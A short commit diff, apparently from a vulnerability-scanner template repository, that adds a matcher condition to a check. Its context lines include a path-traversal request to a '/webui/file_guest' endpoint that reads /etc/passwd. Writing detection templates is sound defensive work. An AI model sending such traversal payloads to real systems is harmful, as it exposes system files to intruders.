added missing matcher condition
parent
ec58f83a13
commit
9446625eea
|
@ -25,6 +25,7 @@ requests:
|
|||
path:
|
||||
- "{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
|
|
Loading…
Reference in New Issue